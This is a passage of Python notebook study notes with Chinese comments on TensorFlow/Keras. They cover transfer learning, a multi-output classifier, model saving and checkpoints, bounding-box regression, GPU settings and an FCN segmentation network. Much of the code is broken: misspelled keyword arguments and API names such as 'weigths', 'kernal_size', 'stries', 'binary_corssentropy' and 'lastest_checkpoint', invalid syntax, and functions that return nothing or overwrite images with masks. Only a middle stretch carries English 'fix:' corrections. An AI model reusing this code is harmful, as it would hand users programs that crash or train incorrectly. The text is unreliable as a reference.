steps_per_epoch=train_count//BATCH_SIZE, epochs=12, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) # 4)解冻预训练模型的部分参数 covn_base.trainable = True len(covn_base.layers) #预训练模型一共19层 fine_tune_at = -3 for layer in covn_base.layers[:fine_tune_at]: layer.trainable = False #除去后3层,其余都是不可训练的 # 5)联合训练 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005/10), #需要使用更小的lr loss='binary_corssentropy', metrics=['acc']) initial_epochs = 12 fine_tune_epochs = 10 total_epochs = initial_epochs + fine_tune_epochs history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=total_epochs, initial_epoch = initial_epochs, #新增参数 validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% Xception预训练模型 # Xception默认图片大小为299*299*3 tf.keras.applications.xception.Xception( include_top=True, #是否包含顶层全连接层 weigths='imagenet', #加载imagenet数据集上预训练的权重 input_tensor=None, input_shape=None, #仅当include_top=False时有效,可输入自定义大小的图片,比如256*256*3 pooling=None, #avg or max => 输出为(None, dim), 而None => 输出为(None,length,width,channel) classes=1000) # 1)在Xception预训练模型上添加自定义层,进行训练 covn_base = tf.keras.applications.xception.Xception(include_top=False, weigths='imagenet', input_shape=(256,256,3), pooling='avg') covn_base.trainable = False covn_base.summary() model = keras.Sequential() model.add(covn_base) #model.add(layers.GlobalAveragePooling2D()) #由于Xception已经使用了pooling='avg' model.add(layers.Dense(512, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(optimizer=keras.optimizers.Adam(lr=0.0005), loss='binary_corssentropy', metrics=['acc']) initial_epochs = 5 history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=initial_epochs, validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) # 2)解冻Xception的部分参数,结合新增自定义层进行fine-tune训练 covn_base.trainable = True len(covn_base.layers) #预训练模型一共133层 fine_tune_at = -33 for layer in covn_base.layers[:fine_tune_at]: layer.trainable = 
False #除去后33层,其余都是不可训练的 model.compile(optimizer=keras.optimizers.Adam(lr=0.0005/10), #需要使用更小的lr loss='binary_corssentropy', metrics=['acc']) fine_tune_epochs = 5 total_epochs = initial_epochs + fine_tune_epochs history = model.fit(train_image_ds, steps_per_epoch=train_count//BATCH_SIZE, epochs=total_epochs, initial_epoch = initial_epochs, #新增参数 validation_data=test_image_ds, validation_steps=test_count//BATCH_SIZE) #%% 多输出模型 import tensorflow as tf from tensorflow import keras import matplotlib.pyplot as plt %matplotlib inline import numpy as np import glob import os import pathlib import random # 获取图片路径 data_dir = './dateset/moc' data_root = pathlib.Path(data_dir) for item in data_root.iterdir(): print(item) all_image_path = list(data_root.glob('*/*')) #获取给定路径下的所有文件路径 all_image_path = [str(x) for x in all_image_path] random.shuffle(all_image_path) image_count = len(all_image_path) #2525 # 获取样本标签 label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir()) #获取给定路径下的所有一级文件夹名称,eg 'red_jeans' color_label_names = set(name.split('_')[0] for name in label_names) #3 colors item_label_names = set(name.split('_')[1] for name in label_names) #4 items color_label_to_index = dict((name, index) for index, name in enumerate(color_label_names)) # {'black':0, 'red':1, 'blue':2} item_label_to_index = dict((name, index) for index, name in enumerate(item_label_names)) # all_image_labels = [pathlib.Path(p).parent.name for p in all_image_path] #获取每个样本的标签: 0/1 color_labels = [color_label_to_index[p.split('_')[0]] for p in all_image_labels] item_labels = [item_label_to_index[p.split('_')[1]] for p in all_image_labels] color_index_to_label = dict(v,k for k,v in color_label_to_index.items) item_index_to_label = dict(v,k for k,v in item_label_to_index.items) # 随机取出图像查看 import Ipython.display as display for n in range(3): image_index = random.choice(range(len(all_image_path))) display.display(display.Image(all_image_path[image_index])) print(all_image_label[image_index]) 
# plt.imshow(): displays an already-decoded tensor
# display.display(display.Image(image_path)): displays an image given its path

# read an image with tensorflow
def load_preprosess_image(img_path):
    """Read a JPEG, resize to 224x224 and normalise pixel values to [-1, 1]."""
    img_raw = tf.io.read_file(img_path)
    img_tensor = tf.image.decode_jpeg(img_raw, channels=3)  # decode jpeg
    img_tensor = tf.image.resize(img_tensor, (224, 224))    # resize also gives the tensor a static shape
    print(img_tensor.shape)
    print(img_tensor.dtype)
    img_tensor = tf.cast(img_tensor, tf.float32)  # tf.uint8 -> tf.float32
    img_tensor = img_tensor / 255.0               # scale to [0, 1]
    img_tensor = 2 * img_tensor - 1               # normalise to [-1, 1]
    img_numpy = img_tensor.numpy()
    print(img_numpy.max(), img_numpy.min())
    return img_tensor

# preview: map back to [0, 1] before imshow
plt.imshow((load_preprosess_image(all_image_path[100]) + 1) / 2)
plt.xlabel(all_image_labels[100])

# build the image dataset and the (color, item) label dataset
BATCH_SIZE = 32
AUTOTUNE = tf.data.experimental.AUTOTUNE
path_ds = tf.data.Dataset.from_tensor_slices(all_image_path)
image_ds = path_ds.map(load_preprosess_image, num_parallel_calls=AUTOTUNE)
label_ds = tf.data.Dataset.from_tensor_slices((color_labels, item_labels))
print(image_ds)  # fix: tf.data.Dataset has no `.shape`; printing shows element_spec instead
print(label_ds)
for label in label_ds.take(2):
    print(label[0].numpy(), label[1].numpy())
for img in image_ds.take(2):
    plt.imshow((img + 1) / 2)  # fix: images are in [-1, 1]; imshow expects [0, 1]
image_label_ds = tf.data.Dataset.zip((image_ds, label_ds))

# train/test split
test_count = int(image_count * 0.2)
train_count = image_count - test_count
train_data = image_label_ds.skip(test_count)
test_data = image_label_ds.take(test_count)
# fix: removed `train_count = len(train_data)` - train_count is already known and
# len() is not supported on this dataset
train_data = train_data.shuffle(train_count).batch(BATCH_SIZE)
train_data = train_data.prefetch(buffer_size=AUTOTUNE)  # overlap preprocessing with training
test_data = test_data.batch(BATCH_SIZE)

# model: MobileNetV2 architecture only (weights=None -> trained from scratch)
mobile_net = tf.keras.applications.MobileNetV2(include_top=False,
                                               weights=None,  # fix: was `weigths` (typo)
                                               input_shape=(224, 224, 3))
inputs = tf.keras.Input(shape=(224, 224, 3))
x = mobile_net(inputs)
print(x.shape)  # fix: was `print(x.get_shape)` which printed the bound method, not the shape
#(None, 7, 7, 1280)
x = tf.keras.layers.GlobalAveragePooling2D()(x)  # or tf.keras.layers.Flatten()(x)
print(x.shape)  # (None, 1280); fix: was `print(x.get_shape)` (bound method)
x1 = tf.keras.layers.Dense(1024, activation='relu')(x)
x2 = tf.keras.layers.Dense(1024, activation='relu')(x)
out_color = tf.keras.layers.Dense(len(color_label_names), activation='softmax', name='out_color')(x1)
out_item = tf.keras.layers.Dense(len(item_label_names), activation='softmax', name='out_item')(x2)
model = tf.keras.Model(inputs=inputs, outputs=[out_color, out_item])  # one input, two outputs
model.summary()

# model training
model.compile(optimizer=keras.optimizers.Adam(learning_rate=0.0005),
              loss={'out_color': 'sparse_categorical_crossentropy',  # fix: was 'sparse_categorical_corssentropy'
                    'out_item': 'sparse_categorical_crossentropy'},
              metrics=['acc'])
train_steps = train_count // BATCH_SIZE
test_steps = test_count // BATCH_SIZE
history = model.fit(train_data,
                    steps_per_epoch=train_steps,
                    epochs=15,
                    batch_size=BATCH_SIZE,  # NOTE(review): ignored for dataset inputs; batching is done in the pipeline
                    validation_data=test_data,
                    validation_steps=test_steps)

# model evaluation
# NOTE(review): test_image_array / test_color_labels / test_item_labels are assumed to
# be prepared elsewhere - TODO confirm
model.evaluate(test_image_array, [test_color_labels, test_item_labels], verbose=0)

# model prediction
my_image = load_preprosess_image(r'{}'.format(random.choice(test_dir)))
#my_image = load_preprosess_image(all_image_path[0])
pred = model.predict(np.expand_dims(my_image, axis=0))  # fix: was np.expend_dims; add batch dim -> (1, 224, 224, 3)
# or: pred = model(np.expand_dims(my_image, axis=0), training=False)
pred_color = color_index_to_label.get(np.argmax(pred[0][0]))  # most probable colour
pred_item = item_index_to_label.get(np.argmax(pred[1][0]))    # fix: the dict was called like a function; use .get
plt.imshow((my_image + 1) / 2)  # fix: my_image is already preprocessed; don't preprocess it twice
plt.xlabel(pred_color + '_' + pred_item)

#%% Saving & restoring models
# 5 ways: whole model / architecture only / weights only /
# checkpoints during fit (callback) / checkpoints in a custom training loop
# Fashion-MNIST example
(train_image, train_label), (test_image, test_label) = tf.keras.datasets.fashion_mnist.load_data()
train_image = train_image / 255.0  # scale to [0, 1]
test_image = test_image / 255.0
print(train_image.shape)  # (60000, 28, 28)
ds_train_img = tf.data.Dataset.from_tensor_slices(train_image)
ds_train_lab = tf.data.Dataset.from_tensor_slices(train_label)
ds_train = tf.data.Dataset.zip((ds_train_img, ds_train_lab))  # element-wise pairing: ((28,28), ())
ds_test = tf.data.Dataset.from_tensor_slices((test_image, test_label))  # same structure as ds_train
ds_train = ds_train.shuffle(10000).repeat().batch(64)
ds_test = ds_test.batch(64)

model = tf.keras.Sequential([tf.keras.layers.Flatten(input_shape=(28, 28)),  # fix: the layers must be passed as a list
                             tf.keras.layers.Dense(128, activation='relu'),
                             tf.keras.layers.Dropout(0.1),
                             tf.keras.layers.Dense(10, activation='softmax')])
model.summary()
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.01),  # fix: was `opitimizer=tf.keras.optimizer.Adam`
              loss='sparse_categorical_crossentropy',  # fix: was '..._corssentropy'; labels are integer encoded
              metrics=['acc'])
history = model.fit(ds_train,
                    epochs=5,
                    steps_per_epoch=train_image.shape[0] // 64,  # "//" keeps it an int
                    validation_data=ds_test,
                    validation_steps=test_image.shape[0] // 64)

model.evaluate(test_image, test_label, verbose=0)  # evaluation
predict = model.predict(test_image)                # prediction
print(predict[0])             # class probabilities
print(np.argmax(predict[0]))  # most probable class
print(test_label[0])          # ground-truth label

# 1) save the whole model: architecture + weights + optimizer state,
#    so loading restores the exact training state
# 1.1) save
model.save('./my_model.h5')  # keras HDF5 format
# 1.2) load
new_model = tf.keras.models.load_model('./my_model.h5')
new_model.summary()
new_model.evaluate(test_image, test_label, verbose=0)  # same results as the original model

# 2) architecture only
json_config = model.to_json()
reinitialized_model = tf.keras.models.model_from_json(json_config)  # fix: was tf.keras.model.model_from_json
reinitialized_model.summary()
reinitialized_model.evaluate(test_image, test_label, verbose=0)  # raises: must compile first
reinitialized_model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.01),  # fix: opitimizer/optimizer typos
                            loss='sparse_categorical_crossentropy',  # fix: typo
                            metrics=['acc'])
reinitialized_model.evaluate(test_image, test_label, verbose=0)  # low accuracy: weights are untrained

# 3) weights only
weights = model.get_weights()               # fetch the weights
reinitialized_model.set_weights(weights)    # load them
reinitialized_model.evaluate(test_image, test_label, verbose=0)  # high accuracy again
model.save_weights('./my_weights.h5')       # persist the weights to disk
reinitialized_model.load_weights('./my_weights.h5')  # load weights from disk
reinitialized_model.evaluate(test_image, test_label, verbose=0)  # same accuracy as above
# NOTE: 2) + 3) are NOT equivalent to 1): only 1) saves the optimizer state.

# 4) checkpoints during training (ModelCheckpoint callback)
# 4.1) save checkpoints
checkpoint_path = './my.ckpt'
my_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
                                                 monitor='val_loss',    # fix: was `moniter` (typo)
                                                 save_best_only=False,  # True keeps only the best-monitored epoch
                                                 save_weights_only=True,
                                                 mode='auto',
                                                 save_freq='epoch',
                                                 verbose=0)
model = tf.keras.Sequential([tf.keras.layers.Flatten(input_shape=(28, 28)),  # fix: layers must be passed as a list
                             tf.keras.layers.Dense(128, activation='relu'),
                             tf.keras.layers.Dropout(0.1),
                             tf.keras.layers.Dense(10, activation='softmax')])
model.summary()
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.01),  # fix: `opitimizer=tf.keras.optimizer.Adam`
              loss='sparse_categorical_crossentropy',  # fix: typo; labels are integer encoded
              metrics=['acc'])
history = model.fit(ds_train,
                    epochs=5,
                    steps_per_epoch=train_image.shape[0] // 64,
                    validation_data=ds_test,
                    validation_steps=test_image.shape[0] // 64,
                    callbacks=[my_callback])

# 4.2) restore from the checkpoint
model = tf.keras.Sequential([tf.keras.layers.Flatten(input_shape=(28, 28)),  # fix: list of layers
                             tf.keras.layers.Dense(128, activation='relu'),
                             tf.keras.layers.Dropout(0.1),
                             tf.keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.01),  # fix: typos
              loss='sparse_categorical_crossentropy',
              metrics=['acc'])
model.evaluate(test_image, test_label, verbose=0)  # low accuracy: untrained

# 4.2.1) load only the weights from the checkpoint
model.load_weights(checkpoint_path)
model.evaluate(test_image, test_label, verbose=0)  # high accuracy after loading

# 4.2.2) load the whole model (requires save_weights_only=False in the callback)
model = tf.keras.models.load_model(checkpoint_path)
model.evaluate(test_image, test_label, verbose=0)

# 5) checkpoints inside a custom training loop
model = tf.keras.Sequential([tf.keras.layers.Flatten(input_shape=(28, 28)),  # fix: list of layers
                             tf.keras.layers.Dense(128, activation='relu'),
                             tf.keras.layers.Dropout(0.1),
                             tf.keras.layers.Dense(10, activation='softmax')])
optimizer = tf.keras.optimizers.Adam()
loss_func = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False)  # fix: was SparseCategorialCrossentropy with
# from_logits=True, but the model ends in softmax (probabilities, not logits)
train_loss = tf.keras.metrics.Mean('train_loss') train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy') def loss(model, x, y): y_ = model(x) loss = loss_func(y, y_) return loss def train_step(model, images, labels): with tf.GradientTape() as t: predictions = model(images) loss_step = loss_func(labels, predictions) grads = t.gradient(loss_step, model.trainable_variables) #计算loss相对模型变量的梯度 optimizer.apply_gradients(zip(grads, model.trainable_variables)) #使用grads更新模型变量,即优化过程 train_loss(loss_step) #计算平均loss,备注:在循环过程中会记录下每个Batch的loss train_accuracy(labels, predictions) #计算平均accuracy # 5.1)保存检查点 cp_dir = './ckpt_dir/' cp_prefix = os.path.join(cp_dir, 'ckpt') #文件前缀设置为ckpt checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model) #初始化检查点文件 def train(): for epoch in range(10): for (batch, (images, labels)) in enumerate(ds_train): train_step(model, images, labels) #every batch print('Epoch{} is finished. loss is {}, accuracy is {}.' \ .format(epoch, train_loss.result(), train_accuracy.result())) train_loss.reset_states() train_accuracy.reset_states() checkpoint.save(file_prefix=cp_prefix) #每个epoch保存一次检查点 train() # 5.2)恢复检查点 checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model) #初始化检查点文件 checkpoint.restore(tf.train.lastest_checkpoint(cp_dir)) #恢复最新的检查点文件 test_pred = tf.argmax(model(test_image, training=False), axis=-1).numpy() print((test_pred == test_label).sum()/len(test_label)) #return acc #%% 图像算法 # 1)图像分类 # 2)图像分类+定位(矩形框标识) # 3)语义分割(semantic segmentation, 区分图像中每个像素点的类别,比如人和狗) # 4)目标检测(object localization, 矩形框标识别所有物体的位置) # 5)实例分割(类似语义分割,但对每个实体都进行区分,比如不同只狗) #%% 图像定位(有监督的回归问题,使用L1/L2损失) # Oxford-IIIT pet dataset:包含37种宠物,每种宠物200张图片左右,及每种宠物的类别、头部轮廓标注、语义分割信息。 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline from lxml import etree import numpy as np import glob tf.test.is_gpu_available() # 1)读取图像文件和位置文件 images = glob.glob('./images/*.jpg') xlms = 
glob.glob('./annotations/xlms/*.xlm') print(len(images)) #7653 print(len(xlms)) #3686 names = [x.split('/')[-1].split('.')[0] for x in xlms] imgs_train = [x for x in images if x.split('/')[-1].split('.')[0] in names] #标记位置的图片 imgs_test = [x for x in images if x.split('/')[-1].split('.')[0] not in names] #未标记位置的图片 imgs_train.sort(key=lambda x: x.split('/')[-1].split('.')[0]) xlms.sort(key=lambda x: x.split('/')[-1].split('.')[0]) print(imgs_train[-5:]) print(xlms[-5:]) # 2)获取label_datasets # xml文件的位置信息提取 def to_labels(path): # xml = open('./annotations/Abyssinian_1.xml').read() xml = open(path).read() sel = etree.HTML(xml) width = int(sel.xpath('//size/width/text()')[0]) height = int(sel.xpath('//size/height/text()')[0]) xmin = int(sel.xpath('//bndbox/xmin/text()')[0]) xmax = int(sel.xpath('//bndbox/xmax/text()')[0]) ymin = int(sel.xpath('//bndbox/ymin/text()')[0]) ymax = int(sel.xpath('//bndbox/ymax/text()')[0]) # 针对缩放的图片,对位置信息进行相应比例的转换 # xmin = (xmin/width)*224 # xmax = (xmax/width)*224 # ymin = (ymin/height)*224 # ymax = (ymax/height)*224 return [xmin/width, xmax/width, ymin/height, ymax/height] labels = [to_labels(path) for path in xlms] out1, out2, out3, out4 = list(zip(*labels)) out1 = np.array(out1) out2 = np.array(out2) out3 = np.array(out3) out4 = np.array(out4) label_datasets = tf.data.Dataset.from_tensor_slice((out1,out2,out3,out4)) # 3)获取image_datasets # 图片解码 def read_ipg(image_path): img = tf.io.read_file(image_path) img = tf.image.decode_jpeg(img, channels=3) return img # 由于图片大小不同,因此需要对图片进行缩放 def normalize(input_image): img = tf.image.resize(input_image, [224,224]) img = img/127.5 -1 #归一化到[-1,1] @tf.function def load_image(path): img = read_ipg(path) # print(img.shape) #(400,600,3) # plt.imshow(img) img = normalize(img) # plt.imshow(img) return img image_paths = tf.data.Dataset.from_tensor_slice(imgs_train) image_datasets = image_paths.map(load_image) BATCH_SIZE = 32 datasets = tf.data.Dataset.zip((image_datasets,label_datasets)) image_count = 
len(image_count) test_count = int(image_count * 0.2) train_count = image_count - test_count train_datasets = datasets.skip(test_count) test_datasets = datasets.take(test_count) train_datasets = train_datasets.shuffle(train_count).repeat().batch(BATCH_SIZE) test_datasets = test_datasets.batch(BATCH_SIZE) # 4)恢复datasets的图片及位置框 for img, label in train_datasets.take(1): #take one batch plt.imshow(tf.keras.preprocessing.image.array_to_img(img[0])) out1,out2,out3,out4 = label xmin,ymin,xmax,ymax = out1[0].numpy()*224, out2[0].numpy()*224, out3[0].numpy()*224, out4[0].numpy()*224 # 图片上的矩形框绘制 rect = Rectangle((xmin, ymin),(xmax-xmin),(ymax-ymin),fill=False, color='red') #起始点坐标、x轴长度、y轴长度 ax = plt.gca() #获取当前图像 get_current_image ax.axes.add_patch(rect) #当前图像中添加矩形框 plt.show() # 5)构建图像定位的预测模型(回归问题) xception = tf.keras.applications.xception.Xception(include_top=False, weigths='imagenet', input_shape=(224,224,3), pooling='avg') xception.trainable = False xception.summary() inputs = tf.keras.layers.Input(shape=(224,224,3)) x = xception(inputs) x = tf.keras.layers.GlobalAveragePooling2D(x) x = tf.keras.layers.Dense(4096,activation='relu')(x) x = tf.keras.layers.Dense(1000,activation='relu')(x) y1 = tf.keras.layers.Dense(1)(x) y2 = tf.keras.layers.Dense(1)(x) y3 = tf.keras.layers.Dense(1)(x) y4 = tf.keras.layers.Dense(1)(x) model = tf.keras.Model(inputs=inputs, outputs=[y1, y2, y3, y4]) #单输入、多输出 model.compile(optimizer=keras.optimizers.Adam(lr=0.0001), #lr需要较小 loss='mse', metrics=['mae']) EPOCHS = 10 history = model.fit(train_datasets, steps_per_epoch=train_count//BATCH_SIZE, epochs=EPOCHS, validation_data=test_datasets, validation_steps=test_count//BATCH_SIZE) # 6)绘制预测效果 loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(EPOCHS) plt.figure() plt.plot(epochs, loss, 'r', label='train-loss') plt.plot(epochs, val_loss, 'b', label='test-loss') plt.title('Train and validation loss') plt.xlabel('Epochs') plt.ylabel('Loss') plt.legend() plt.show() # 
7)模型保存与加载 model.save('./image_location_detect_v1.h5') new_model = tf.keras.models.load_model('./image_location_detect_v1.h5') # 8)预测结果验证 plt.figure(figsize=(8,24)) for img, _ in test_datasets.take(1): #take one batch out1,out2,out3,out4 = new_model.predict(img) # 显示3张图片,及预测的矩形框 for i in range(3): plt.subplot(3,1,i+1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[i])) xmin,ymin,xmax,ymax = out1[i].numpy()*224, out2[i].numpy()*224, out3[i].numpy()*224, out4[i].numpy()*224 # 图片上的矩形框绘制 rect = Rectangle((xmin, ymin),(xmax-xmin),(ymax-ymin),fill=False, color='red') #起始点坐标、x轴长度、y轴长度 ax = plt.gca() #获取当前图像 get_current_image ax.axes.add_patch(rect) #当前图像中添加矩形框 # 9)图像定位的评价指标 # IoU:Intersection over Union(交并比),即预测边框和真实边框的交集和并集的比值。 # 10)优化方向 # 先大后小:先预测出关键点,后在关键点周边预测范围 # 图片划窗:是否有关键点、关键点的位置 # 针对不确定实体个数的预测问题:先检测多个对象,然后在多个对象上回归出位置 # 变回归为分类问题:即定位区域的像素点为1,其余位置为0 #%% 自动图运算(Graph execution) # 使用@tf.function装饰器,实现自动图运算,从而将模型转换为易于部署的tensorflow图模型 # 内部机制: #在eager模型关闭下,函数内代码依次运行,每个tf代码都只定义了计算节点,而非真正的计算 #使用AutoGraph将函数中的python控制流转换成Tensorflow计算图中对应节点,比如while,for转换为tf.while,if转换为tf.cond等 #建立函数内代码计算图,为了保证计算图的顺序,图中还会自动添加一些tf.control_dependencies节点 #运行一次该计算图 #基于函数类型和输入函数参数类型生成一个哈希值,并将建立的计算图缓存到一个哈希表中 #在被@tf.function修饰的函数被再次调用时,根据函数名和输入的函数参数类型计算哈希值,检查哈希表中是否有对应计算图的缓存,如果是则继续使用已缓存的计算图,否则的话根据上述步骤建立计算图。 # 使用方法: #当定义多个函数实现不同运算式时,仅需要在最后调用的函数上添加@tf.function即可,这样所有的运算节点都会被编译。 @tf.function def train_step(model, images, labels): pass #%% GPU的使用和分配 import tensorflow as tf tf.test.is_gpu_available() # 获得当前主机上运算设备列表 gpus = tf.config.experimental.list_physical_devices(device_type='GPU') cpus = tf.config.experimental.list_physical_devices(device_type='CPU') #[PhysicalDevice(name='/physical_device:CPU:0', device_type='CPU')] # 使用既定的运算资源 tf.config.experimental.set_visible_devices(devices=gpus[0:2],device_type='GPU') # 仅在需要时申请显存空间 (动态申请显存空间) for gpu in gpus: tf.config.experimental.set_memory_growth(device_gpu, True) # 设置消耗固定大小的显存 tf.config.experimental.set_virtual_device_configration(gpus[0], 
[tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)]) #%% 图像语义分割 # 目标:预测图像中每个像素的类别(区分背景、边缘、同类实体) # Model-1:FCN (Fully convolutional network),相比较于分类网络,FCN最后不使用全连接层,而使用上采样和跳接结构,还原至原图像大小 # Model-2:Unet,从更少的图像中进行学习, #%% 图像语义分割 - FCN(同图像定位的数据) # 输入:任意尺寸彩色图像 # 输出:与输入尺寸相同 # 通道数:n(目标类别数 + 1(背景) # 1) Upsampling:插值法、反池化、反卷积(转制卷积) # 反卷积: # 通过训练来放大图片 # tf.keras.layers.Conv2DTranspose(filters=32,kernal_size=(3,3),stries=(1,1),padding='same') # 2) 跳接结构 # 用于结合前面的局部特征和后面的全局特征 import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline from lxml import etree import numpy as np import glob # 1)原图像与语义分割图像处理 images = glob.glob('./images/*.jpg') anno = glob.glob('./annotations/trimaps/*.png') # shuffle np.random.seed(2) index = np.random.permutation(len(images)) images = np.array(images)[index] anno = np.array(anno)[index] dataset = tf.data.Dataset.from_tensor_slices((images, anno)) # 原图像解码 def read_jpg(path): # img = tf.io.read_file('./images/yorkshire_terrier_99.jpg') img = tf.io.read_file(path) img = tf.image.decode_jpeg(img, channels=3) # plt.imshow(img) return img # 语义图像解码 def read_png(path): # img = tf.io.read_file('./images/yorkshire_terrier_99.jpg') img = tf.io.read_file(path) img = tf.image.decode_png(img, channels=1) # print(img.shape) #(358,500,1) # img = tf.squeeze(img) # print(img.shape) #(358,500) # plt.imshow(img) # print(np.unique(img.numpy())) #array([1,2,3]) return img # 图片大小 def resize_img(images): images = tf.image.resize(images, [224,224]) return images # 归一化 def normal_img(input_images, input_anno): input_images = tf.cast(input_images, tf.float32) input_images = input_images/127.5 - 1 #[-1,1] input_anno = input_anno -1 #[0,1,2] return input_images, input_anno def load_images(input_images_path, input_anno_path): input_images = read_jpg(input_images_path) input_anno = read_png(input_anno_path) input_images = resize_img(input_images) input_images = resize_img(input_anno) return 
normal_img(input_images, input_anno) BATCH_SIZE = 32 AUTOTUNE = tf.data.experimental.AUTOTUNE #根据CPU数目,自动使用并行运算 dataset = dataset.map(load_images, num_parallel_calls=AUTOTUNE) test_count = len(images) * 0.2 train_count = len(images) - test_count data_train = dataset.skip(test_count) data_train = data_train.shuffle(100).repeat().batch(BATCH_SIZE) data_train = data_train.prefetch(AUTOTUNE) print(data_train.shape) #((None,224,224,3), (None,224,224,1)) data_test= dataset.take(test_count) data_test = data_test.batch(BATCH_SIZE) data_test = data_test.prefetch(AUTOTUNE) # 同时显示原图像和语义分割图像 for img, anno in data_train.take(1): plt.subplot(2,1,1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[0])) plt.subplot(2,1,2) plt.imshow(tf.keras.preprocessing.image.array_to_img(anno[0])) # 2)预训练模型构建 conv_base = tf.keras.applications.VGG16(include_top=False, weigths='imagenet', input_shape=(256,256,3)) conv_base.summary() # 最后一层(7,7,512)=>上采样为(14,14,512)=>与上层输出相加(14,14,512)=>再上采样为(28,28,256)=>与上层输出相加(28,28,256)=> ...=> 最终输出(224,224,1) # 3)获得模型中间层的输出 # 如何获取网络中某层的输出? conv_base.get_layer('block5_conv3').output # 如何获取子模型? 
(子模型继承了原模型的权重) sub_model = tf.keras.models.Model(inputs=conv_base.input, output=conv_base.get_layer('block5_conv3').output) sub_model.summary() # 获取预训练模型的多个中间层的输出 layer_names = ['block5_conv3', 'block4_conv3', 'block3_conv3', 'block5_pool'] #要获取的中间层名称 layers_output = [conv_base.get_layer(layer_name).output for layer_name in layer_names] multi_out_model = tf.keras.models.Model(inputs=conv_base.input, output=layers_output) print(multi_out_model.predict(image)) #分别返回4个子模型的预测输出结果 multi_out_model.trainable = False # 4)FCN模型构建 inputs = tf.keras.layers.Input(shape=(224,224,3)) out_block5_conv3, out_block4_conv3, out_block3_conv3, out = multi_out_model(inputs) print(out.shape) #(None,7,7,512) print(out_block5_conv3.shape) #(None,14,14,512) print(out_block4_conv3.shape) #(None,28,28,512) print(out_block3_conv3.shape) #(None,56,56,256) # a) 针对out进行upsampling x1 = tf.keras.layers.Conv2DTranspose(filters=512, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(out) #(None,14,14,512) # 增加一层卷积,增加特征提取程度 x1 = tf.keras.layers.Conv2D(filters=512, kernal_size=(3,3), padding='same', activation='relu')(x1) #(None,14,14,512) # 与上层进行相加 x2 = tf.add(x1, out_block5_conv3) #(None,14,14,512) # b) 针对x2进行upsampling x2 = tf.keras.layers.Conv2DTranspose(filters=512, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x2) #(None,28,28,512) # 增加一层卷积,增加特征提取程度 x2 = tf.keras.layers.Conv2D(filters=512, kernal_size=(3,3), padding='same', activation='relu')(x2) #(None,28,28,512) # 与上层进行相加 x3 = tf.add(x2, out_block4_conv3) #(None,28,28,512) # c) 针对x2进行upsampling x3 = tf.keras.layers.Conv2DTranspose(filters=256, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x3) #(None,56,56,256) # 增加一层卷积,增加特征提取程度 x3 = tf.keras.layers.Conv2D(filters=256, kernal_size=(3,3), padding='same', activation='relu')(x3) #(None,56,56,256) # 与上层进行相加 x4 = tf.add(x3, out_block3_conv3) #(None,56,56,256) # d) 针对x4进行upsampling x5 = 
tf.keras.layers.Conv2DTranspose(filters=64, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='relu')(x4) #(None,112,112,64) # 增加一层卷积,增加特征提取程度 x5 = tf.keras.layers.Conv2D(filters=64, kernal_size=(3,3), padding='same', activation='relu')(x5) #(None,112,112,64) # d) 针对x5进行upsampling prediction = tf.keras.layers.Conv2DTranspose(filters=3, kernal_size=(3,3), stries=2, #变为原来的2倍大小 padding='same', activation='softmax')(x5) #(None,224,224,3) # 最终创建模型 model = tf.keras.models.Model(inputs=inputs, outputs=prediction) model.summary() # 5)FCN模型训练 model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc']) history = model.fit(data_train, epochs=5, steps_per_epoch=train_count//BATCH_SIZE, validation_data=data_test, validation_steps=test_count//BATCH_SIZE) loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(EPOCHS) plt.figure() plt.plot(epochs, loss, 'r', label='train-loss') plt.plot(epochs, val_loss, 'b', label='test-loss') plt.title('Train and validation loss') plt.xlabel('Epochs') plt.ylabel('Loss') plt.ylim([0,1]) plt.legend() plt.show() # 6) 模型预测 for img, mask in data_test.take(1): #take one batch pred = model.predict(img) pred = tf.argmax(pred, axis=-1) pred = pred[..., tf.newaxis] #扩展维度 (None,224,224,1) plt.figure(figsize=(10,10)) num = 5 for i in range(num): plt.subplot(num, 3, i*3+1) plt.imshow(tf.keras.preprocessing.image.array_to_img(img[i])) #原图 plt.subplot(num, 3, i*3+2) plt.imshow(tf.keras.preprocessing.image.array_to_img(mask[i])) #语义分割图 plt.subplot(num, 3, i*3+3) plt.imshow(tf.keras.preprocessing.image.array_to_img(pred[i])) #预测的语义分割图 #%% RNN # tf.keras.layers.LSTM # tf.keras.layers.GRU # input_shape is (batch_size, seq_length, embedding_size) # output_shape is (batch_size, tags) import tensorflow as tf import matplotlib.pyplot as plt from matplotlib.patches import Rectangle %matplotlib inline import numpy as np import re # 数据集:航空公司评论数据集 data = pd.read_csv('./Tweet.csv') #including text 
